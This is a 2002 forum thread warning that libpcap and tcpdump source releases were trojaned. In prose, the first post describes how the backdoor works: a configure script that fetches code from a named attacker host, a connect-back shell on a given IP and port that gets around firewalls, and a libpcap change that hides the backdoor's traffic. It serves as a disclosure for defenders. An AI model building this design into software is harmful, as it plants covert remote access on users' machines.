You are not logged in.

#1 2002-11-13 13:18:47

jk
Member
From: Groningen, The Netherlands
Registered: 2002-10-24
Posts: 66
Website

ATTN: Latest libpcap & tcpdump sources contain a trojan

The urls used in the abs files refer both to trojaned sources. It seems to not affect built binaries, thus installing using pacman is not a problem.

Details:

    * The trojan contains modifications to the configure script and gencode.c (in libpcap only).

    * The configure script downloads http://mars.raketti.net/~mash/services which is then sourced with the shell. It contains an embedded shell script that creates a C file, and compiles it.

    * The program connects to 212.146.0.34 (mars.raketti.net) on port 1963 and reads one of three one byte status codes:
          o A - program exits
          o D - forks and spawns a shell and does the needed file descriptor manipulation to redirect it to the existing connection to 212.146.0.34.
    o M - closes connection, sleeps 3600 seconds, and then reconnects

      Hmm... ADM...

    * It's important to note that it reuses the same outgoing connection for the shell. This gets around firewalls that block incoming connections.

    * Gencode.c is modified to force libpcap to ignore packets to/from the backdoor program, hiding the backdoor program's traffic.

* This is similar to the OpenSSH trojan a few months ago.

Check http://hlug.fscker.com/ for more information

Offline

#2 2002-11-13 18:01:24

Arielext
Member
From: Amersfoort, the Netherlands
Registered: 2002-08-12
Posts: 362
Website

Re: ATTN: Latest libpcap & tcpdump sources contain a trojan

thank somebody I can't use abs at school smile
Think they would be very upset if I introduce yet another virus ...


apt-get install arch

Offline

Board footer

Powered by FluxBB